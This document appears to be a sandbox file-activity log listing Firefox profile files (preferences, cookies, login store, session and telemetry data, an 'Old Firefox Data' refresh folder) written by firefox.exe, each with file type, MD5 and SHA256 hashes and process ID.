C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: 96d433cb5a6ea01eb72d057363a378c1
SHA256: f2e708400aabf9114b252889bc260e46ca5d9e490c251d714ebba81142ff3e31
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\pluginreg.dat
text
MD5: bb41a5eee03ef43a7c1f9fcf0924ea7c
SHA256: b7251b1613038b056a60bc667d0a8982238c9b784485ce2b2e5d5ab302441dcd
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\pluginreg.dat.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionCheckpoints.json
text
MD5: ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA256: 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: 7c2ffefeece82e866a4f103b902f1ac1
SHA256: 9d93ccbf3ac046b1ddecfe3e0fe76632c5e5e7d2bd22ef30902c142e789c3a28
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\extensions.json
text
MD5: 9971119eecb076bfc1da98577e1d0a8e
SHA256: d342643fa5c2338d1f09d9fc3082b9af00dfe5a8bebca87115d2ddc5acc84f5e
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: 9baf95d4767309f9c61ed3741bbca321
SHA256: 2eb904104875547136a569139bdaa4cf587b7b45e0cf5f3729b3ab3860a7f0a8
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cookies.sqlite-shm
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\permissions.sqlite-journal
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
text
MD5: 0dcf8bcfcccc77097d6e3d1fb8a4683c
SHA256: 7ac839083146063d032dc2f79d64d70c57e859a1d253f486d622c339eb114413
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\installs.ini
text
MD5: 219f209c098db6d39d738fe18fa050b6
SHA256: a04c5e0fde410f2e63b10495a5d9a2da21142cdf2e8c80ef3dd42f0dc836ed07
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\xulstore.json
text
MD5: 5dfd4fcd7c69f54399afada8c992dc0a
SHA256: 2aebf2a2359da70d619f7778d10555ef99bc198c011e8f8e5ab61ddb9a0334dd
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\webappsstore.sqlite
sqlite
MD5: 446fbaa8b14b3c86bfcef8be65ee7d80
SHA256: 47dbd4af1ef0e76fd0fc756d4f3a397c251f63cb1b71b1b4405fca69c1ded6e0
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\weave\toFetch\tabs.json
text
MD5: f20674a0751f58bbd67ada26a34ad922
SHA256: 8f05bafd61f29998ca102b333f853628502d4e45d53cff41148d6dd15f011792
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\weave\failed\tabs.json
text
MD5: f20674a0751f58bbd67ada26a34ad922
SHA256: 8f05bafd61f29998ca102b333f853628502d4e45d53cff41148d6dd15f011792
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
sqlite
MD5: 03f94eb2280d552fc63a5e989db6e9b0
SHA256: 447ad21ee804dcc92f5f679163488f4b8a7badaa49af587d71eb103340698751
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage.sqlite
sqlite
MD5: dbd05dd2b9f5d1eda545a1e9a7633c57
SHA256: ea9a021f32f2d6843130d22e9c97831bcb75de8e57c40f5114d799afece0bf35
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\Telemetry.FailedProfileLocks.txt
binary
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\times.json
text
MD5: 7929ebc421c01545bd31e7a240642929
SHA256: 47dc332ba6b154f684848493cc7b1886d714d40b875c9c8dab3f1d3cbdc36124
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
sqlite
MD5: 489c022454909460f333b279bb069afb
SHA256: f513adf09c2970b5898d4942672ef1601ec089f0be4231e797c21101db9d78d4
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
sqlite
MD5: 4a2e7ea7ff01e9317ec51bec4de7eb71
SHA256: 737e63fac5c60dd26c5073b6c346c429434c3df2be6a7220323a314df2bf5c27
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
sqlite
MD5: a7ef12acabc39f008d786f0faf3db7a2
SHA256: bb4f94694b53f728158684ee8cf076929bc3b18331ff01de210347b03c1fa4a5
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
sqlite
MD5: f09df169052e7fc8478b297f66bffced
SHA256: 7f50f5a9395c9926963039335c225603e794e8c20c830e3c2d1f1acc52ad0ed1
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
sqlite
MD5: f98394332a1a66bbc83527d67d3a5cec
SHA256: ba706ad6275f910e58a8b0d89f9dbb98337b81897e91c654f9bfc6104a8a9d9e
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
sqlite
MD5: 37ab83439b77c89c369b307db52f6d9b
SHA256: 2ae407a453cc9131b4191a65a5d37d1359f231742e37cc341e00813e8866df15
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
sqlite
MD5: 2bb13f4da6fd9dcc0e09afbb989ccea8
SHA256: 0111f4e91f0ca15fcd445d8c628076b3af5748c081c171b2346f8beffe3b8270
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
sqlite
MD5: c4dc14853b858cc423d2e3b637e3998c
SHA256: d89706d668282246bbb3ea7b06fbcab501968f916ab4aa4f187f671558122166
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\.metadata-v2
binary
MD5: 12778684c727cacc57627b0d249f2c0b
SHA256: 4ad62a9ed2f2c3f7d59c1aaeea8512079e30be90af22fef4bf2721e0963b9ff4
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\permanent\chrome\.metadata
binary
MD5: 36fd91409594bc22af29fe7d32790bda
SHA256: 762a066726a91f261c65a3d37c8287994a5411d850f56917e8b0dc9f66e07d8e
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\moz-extension+++a35bff6e-5489-4e10-95ce-0340b402ad38^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.sqlite
sqlite
MD5: a93f08c9460d98a9ea46497097e9de70
SHA256: f918c21a229ba11596ccf66397c02fa2fbec51a87f1cca0522f4041058220fd7
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\moz-extension+++a35bff6e-5489-4e10-95ce-0340b402ad38^userContextId=4294967295\.metadata-v2
binary
MD5: ef8ceceb5a89391304b80c65665a20fa
SHA256: 052caee32481059890464ee5a2040fef6c87af0ec735e02529551bc987e8a1c2
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\moz-extension+++a35bff6e-5489-4e10-95ce-0340b402ad38^userContextId=4294967295\.metadata
binary
MD5: 3e098415bd83cda44cd5a7d2a04465b1
SHA256: 236ed15c7cd71c108671aad7b54d73b58d7b188163df6e97db9d67abf2ce0437
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite
sqlite
MD5: 1985c7557ce41ccce454603d4c503a4a
SHA256: 81a822fb068e6c31bb4e937a34d7214ee968c5a8fa03eddb8abd01920c32a4ed
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite
sqlite
MD5: 5871408f922639851ec0e61a7917eb52
SHA256: 93a9f2bea4aebf70bed6a51019405cb9a1df9e3600f9e4b6037bc04a8c660590
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+newtab\.metadata-v2
binary
MD5: 6ea576a1be99d1312e936e51310cd6af
SHA256: 2443973700d8255d812eabc80587ffc5790221de4a5de5f3b6e134ba76c39acd
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+newtab\.metadata
binary
MD5: 40020cc2faa14d73774db0e2a57ca52a
SHA256: f2232593af09c07a850b59c3383878e381a4a01c4b769f2af800efc4d0b71c91
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\2
sz
MD5: c29e943cb5c5e456f96fee0d49aeb521
SHA256: 409717f04e3f1f68aeeeccc97e20a03148104ce3ee781db422f0569ba7047f00
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+home\.metadata-v2
binary
MD5: 23ab4b90a543a64d9335e10466f84313
SHA256: b30378104029ce3cb25d7291fb631d8fb43becf4458382b8e85eb309313b0013
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\storage\default\about+home\.metadata
binary
MD5: 6eac8fc2b98b4e57c56ff3b224cbfe2d
SHA256: f8a129c7152dae2427b67d1c55e82df4402a0aefa4e842bcf823c6ef6c41d4c8
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\SiteSecurityServiceState.txt
text
MD5: 39579060eb191315d681c0e4cec422bd
SHA256: befce98134780fa08c55c01201c0a4183b6727d0e5fc44eb204a9e2e7abcbfa8
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\sessionstore.jsonlz4
jsonlz4
MD5: da5a84a2615e68822fa04e81e66ea403
SHA256: 1c43e3fbd8cf850c863bba57a263da38355b9021b4a9bcc9f1d59ecaf9841ce9
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\sessionstore-backups\upgrade.jsonlz4-20190717172542
jsonlz4
MD5: ccc1c77e268639576eb28953b2cc4247
SHA256: a0faf3111b91c721362c11228fc01c498277e8d071641fe7f42cfdf0de73d4d3
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\sessionstore-backups\upgrade.jsonlz4-20190619235627
jsonlz4
MD5: 97ce580459a943b304de43f2fca70c48
SHA256: 368f3d7911e0ade59c90b08a226f57ecf4de77421063d0478b44615a4f7c9f2f
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\sessionstore-backups\previous.jsonlz4
jsonlz4
MD5: c60d3b6f3e9c76594bfb62c7f960c06d
SHA256: 2c0b480956c6fe283dbce97aaf9175fae4ade1b913e4f6b72d6571802bbd99d8
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\search.json.mozlz4
jsonlz4
MD5: 6d378e0d40b6eaca22c8bce899a1c5c1
SHA256: ada2467b2477aceff837ac7820c435ad1ebbe844b2da31c7ab9ae8d010c7a639
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\sessionCheckpoints.json
text
MD5: 3e62554c9f218730ddf20915068266c9
SHA256: c40d1a8460187b4e8f141f324e3a988805af7983606dd605ee2aef1cfc07e695
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\saved-telemetry-pings\c4f9c9a6-062e-4fd0-8d10-8e2032ac6341
text
MD5: 68baea4a223e60663167708054bbd4b8
SHA256: 9aed41565f8717fc03aa13367bf474388109abc5a38e3497df6eb28f9d3ab226
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\revocations.txt
text
MD5: cc749a7f2609a214e1f3600224ee49fd
SHA256: 814e4a31e2472cdb9865483cb7e70523ba93cbe1e57aa2009945992fa2d41fd6
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\pluginreg.dat
text
MD5: 37818d9b7248f34395c2db3c0bd4b07f
SHA256: ff229e03d2ab696e81957957ea8d71280b5800a2b0f70ea77998c3fa4e98a8a6
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\prefs.js
text
MD5: 0b222bd76075defbfdcd495b52ddd48f
SHA256: 9fa82b1371b176368f298b4b6c6c785a77335c2ed50a88f43da2a8c980ac5029
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\pkcs11.txt
text
MD5: 7649bb6f105448170e7e447e66d8cc3d
SHA256: 687ac2de1316be0e875e2fbbf7dee4547fe0b4eff7987517d216534ef2bbc3c3
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\permissions.sqlite
sqlite
MD5: 7c79021a60593f7d9c69e112d0c4f48f
SHA256: 494d9c87a08be355c761e42a0e25c0a1d85ecb5cb0d67512fcf515cce32f5011
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\logins.json
text
MD5: e7ce898aadd69f4e4280010b7808116e
SHA256: c9214bb54f10242aa254f0758372a440c8d8f49934021f8f08b6df9fb377eb02
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\key4.db
sqlite
MD5: 0b3c43342ce2a99318aa0fe9e531c57b
SHA256: 0ccb4915e00390685621da3d75ebfd5edadc94155a79c66415a7f4e9763d71b8
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\handlers.json
text
MD5: 9b266d3a494b64d3ec19fe585d0ae3cf
SHA256: c8390d32ce4e32bb263a5ca38c59d6a3608da72bed322543b1087ff8af9e2814
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-widevinecdm\4.10.1440.18\widevinecdm.dll.sig
pi2
MD5: 0247346b91cfb2fdcb5ee655b1bd24f7
SHA256: 71bdc76129b97a8b63ac7768ec79157699bf74ce21f312c8b6a93dac289df71c
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-widevinecdm\4.10.1440.18\widevinecdm.dll.lib
obj
MD5: f8e686a482db17ebdb9482cfc89caa24
SHA256: 02fa473df5bf436af35f2988ddd47418a2759090c905eabdc58cabc84e2adffb
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
sqlite
MD5: 8bc94498f1acfbe719f076cfc5a45df2
SHA256: 7b804671d25a987226aef4c1fb2c2da65a0939a362074e977d9c5b40533c7037
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-widevinecdm\4.10.1440.18\LICENSE.txt
text
MD5: 49ddb419d96dceb9069018535fb2e2fc
SHA256: 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-widevinecdm\4.10.1440.18\manifest.json
text
MD5: a26609cfdb56a04fbb0e2b7630fb803f
SHA256: 0fcae47f7247f3531cf712fb4e13d3a30d687c7185056b280a13b30df88b5641
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
sqlite
MD5: 417df721dff61648ac4ea77ba459102e
SHA256: cc018068c1f89b2dc12e7aa40e346772033b6f7ad561fec1d520b171112a4fe4
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\gmp-gmpopenh264\1.8.1\gmpopenh264.info
text
MD5: 3d33cdc0b3d281e67dd52e14435dd04f
SHA256: f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\formhistory.sqlite
sqlite
MD5: 60b51ba20224ac3783e213ea9f55f125
SHA256: 0e305ba02985f26b29b234cd79d2c2af0a51085da2db2bed98d20f8c61b76254
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\features\{4b58246a-1239-4ff8-9650-839c3b3b38d1}\[email protected]
compressed
MD5: 60f708df8b2215113df57901ee314e0a
SHA256: e37e2740b600c52bdaed630d828a7d99e91566e2eeea3296f167243bb8810cc0
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\favicons.sqlite
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\extensions\[email protected]
compressed
MD5: 7721cf856c545b7ea36680d24705513d
SHA256: 5b048e1c16059d3d9b8cf91074a1da58a7e11b7741ca3e19a8b6e11be7bfa4fa
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
binary
MD5: 9c016064a1f864c8140915d77cf3389a
SHA256: 0e7265d4a8c16223538edd8cd620b8820611c74538e420a88e333be7f62ac787
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\datareporting\state.json
text
MD5: 9c5351bbf9d0212293b813ee59dc9213
SHA256: 38b9c0fbd09cdcbd2703e194f1874948a0ff886bb2f46fd0edf7a39cb6d91f57
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\extensions.json
text
MD5: 9cf5e9e40b5f764838f42c8f2721957f
SHA256: ad9889206f043a9d31af59d6db2a74d9680930c009a560e8cd158bafa271af8f
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\datareporting\session-state.json
text
MD5: 51b14998b0a49d359ce2ecee38b56677
SHA256: b77c674272b03dafb0e9e33e19cacf46c40055d8e3ffb030e87813662d543c0b
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\datareporting\archived\2019-09\1568186508187.c4f9c9a6-062e-4fd0-8d10-8e2032ac6341.main.jsonlz4
jsonlz4
MD5: 9f04b6966d7075ebc670c45484c11d10
SHA256: 4c60f2fdfc78cba37283775a1bff580d8c27d11f46922d6906ae5b36c8dcaa02
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\datareporting\archived\2019-09\1568186508189.03f06c74-e0e8-46d4-8e41-5553ef3bef80.first-shutdown.jsonlz4
jsonlz4
MD5: 7d77a156b3de514ce5551305b5539c99
SHA256: 01def5130dda42ccd8cdac5304ad5d91d423a57bcc2504bd80538ecb2ac6c462
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\crashes\store.json.mozlz4
jsonlz4
MD5: a6338865eb252d0ef8fcf11fa9af3f0d
SHA256: 078648c042b9b08483ce246b7f01371072541a2e90d1beb0c8009a6118cbd965
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\cookies.sqlite
sqlite
MD5: 7c426e0fc19063a433349ce713da84a0
SHA256: 9925b2d80f8a85132ef4927979b25e0b9525e8317a71ffd844980b794b04234c
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\content-prefs.sqlite
sqlite
MD5: d98c70110cb36f098c925d9143d3e82b
SHA256: f85e01375ff28aa8085ad214a2550edb7c20b147cb08db4a1a09e45d5120227b
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\containers.json
text
MD5: 94a3843fad8c45c48b0e07342df3dfdc
SHA256: 854ff2076f71097b030c302a1ea71d8e851d2920b9ff5fc8dc8f16c91ba95b72
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\broadcast-listeners.json
text
MD5: 0d6ef5bcc56779514e58ba5d0eb54976
SHA256: a5380befbc2476960b5d90b2483856996877a2e4e1661389854315139af0df27
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\compatibility.ini
ini
MD5: ec94ae575a88d289762c342cf910cef2
SHA256: 023cbaa263693b05f9eb616988c39e391cd4c3a0b939f7217d12596a80a26276
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\cert9.db
sqlite
MD5: 1a5bf66d9571f0a0f3fe504c04efad15
SHA256: 4f9ed8b9f3835a65d637216e95af9fa34e075e62a7c6a08b26d201651d6bebe1
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\addonStartup.json.lz4
jsonlz4
MD5: 65a8568f72fdf05a592210c52784c82a
SHA256: 353279aec0402d3777cd400ecfa22ece3e3e882cb1e57056965db44bd1306465
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\blocklist.xml
xml
MD5: 04bb50a80b2a49abec9e9540f6a1ca67
SHA256: ce9cf8d89739e3bd15b670f928cb996f5bf014aacb3ab891e371b20921f7f42a
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\bookmarkbackups\bookmarks-2019-07-30_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4
jsonlz4
MD5: 8b3a3845e8f6c6076b27362edb8388d7
SHA256: 4f98274fcd24d4a238a86ceec0ddd26c589ebc77ab21c4b18943d1d3ef73dd92
2992
firefox.exe
C:\Users\admin\Desktop\Old Firefox Data\qldyz51w.default\addons.json
text
MD5: 55b5026150dc3a60d07b8bea2ae0f983
SHA256: a13174f20dde2249a49853d6eae20f07ffc4ddf1e3007ab3e4911e511ecffc1c
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\prefs.js
text
MD5: e58f081424192ef8791813467a154ee6
SHA256: b5a130bb687bf275ececf76248bcaf4cfe07b6d84dac2925fc6c9ad719935dd9
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\datareporting\state.json
text
MD5: 9c5351bbf9d0212293b813ee59dc9213
SHA256: 38b9c0fbd09cdcbd2703e194f1874948a0ff886bb2f46fd0edf7a39cb6d91f57
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\datareporting\session-state.json
text
MD5: 51b14998b0a49d359ce2ecee38b56677
SHA256: b77c674272b03dafb0e9e33e19cacf46c40055d8e3ffb030e87813662d543c0b
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionstore.jsonlz4
jsonlz4
MD5: 0c87844560f41d4e901bd7e4b0831ac8
SHA256: 427b6914612dcc77d405bc63f01f0064d8afed214767ea70e77675904280cf81
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionCheckpoints.json
text
MD5: 3e62554c9f218730ddf20915068266c9
SHA256: c40d1a8460187b4e8f141f324e3a988805af7983606dd605ee2aef1cfc07e695
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\sessionstore.jsonlz4.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\bookmarkbackups\bookmarks-2019-07-30_14_uZyx1cMFmZ7ZpL4NneCk2A==.jsonlz4
jsonlz4
MD5: 8b3a3845e8f6c6076b27362edb8388d7
SHA256: 4f98274fcd24d4a238a86ceec0ddd26c589ebc77ab21c4b18943d1d3ef73dd92
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\times.json
text
MD5: c5324cb6f87f3ed8c037531279a77acf
SHA256: 82370715282729578090c6c0dfcef57be64c091a54efe4368b92239ce843fc94
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\times.json.tmp
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\logins.json
text
MD5: e7ce898aadd69f4e4280010b7808116e
SHA256: c9214bb54f10242aa254f0758372a440c8d8f49934021f8f08b6df9fb377eb02
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\formhistory.sqlite
sqlite
MD5: 60b51ba20224ac3783e213ea9f55f125
SHA256: 0e305ba02985f26b29b234cd79d2c2af0a51085da2db2bed98d20f8c61b76254
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\key4.db
sqlite
MD5: 0b3c43342ce2a99318aa0fe9e531c57b
SHA256: 0ccb4915e00390685621da3d75ebfd5edadc94155a79c66415a7f4e9763d71b8
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\cookies.sqlite
sqlite
MD5: 7c426e0fc19063a433349ce713da84a0
SHA256: 9925b2d80f8a85132ef4927979b25e0b9525e8317a71ffd844980b794b04234c
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\favicons.sqlite
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\places.sqlite
––
MD5:  ––
SHA256:  ––
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\times.json
text
MD5: ff7c2adffe0959e131abc2571ead23eb
SHA256: efe16f8b08dd7a8e694558ac02c769e3337aa7382fa37c29b254544d587a5f9e
2992
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\bqolt1ue.default-1568186513887\compatibility.ini
ini
MD5: ec94ae575a88d289762c342cf910cef2
SHA256: 023cbaa263693b05f9eb616988c39e391cd4c3a0b939f7217d12596a80a26276
1016
firefox.exe
C:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\startupCache.4.little
compressed
MD5: 67c52a76377b1f6688004298399fb04e
SHA256: 86f87ff7aae72dd29857def137fdf64426348977038e11bc9b22d321eed7a486
1016
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2019-09\1568186508189.03f06c74-e0e8-46d4-8e41-5553ef3bef80.first-shutdown.jsonlz4
jsonlz4
MD5: 7d77a156b3de514ce5551305b5539c99
SHA256: 01def5130dda42ccd8cdac5304ad5d91d423a57bcc2504bd80538ecb2ac6c462
1016
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\03f06c74-e0e8-46d4-8e41-5553ef3bef80
text
MD5: 805e15e6a85163e7d4c1f01891b6501b
SHA256: 3aca95c2576c7b903d30967387bd5da60ddab815560e6a0e764cc4d0dec5502c
1016
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\03f06c74-e0e8-46d4-8e41-5553ef3bef80.tmp
––
MD5:  ––
SHA256:  ––
1016
firefox.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2019-09\1568186508189.03f06c74-e0e8-46d4-8e41-5553ef3bef80.first-shutdown.jsonlz4.tmp
––
MD5:  ––
SHA256:  ––
1016
firefox.exe
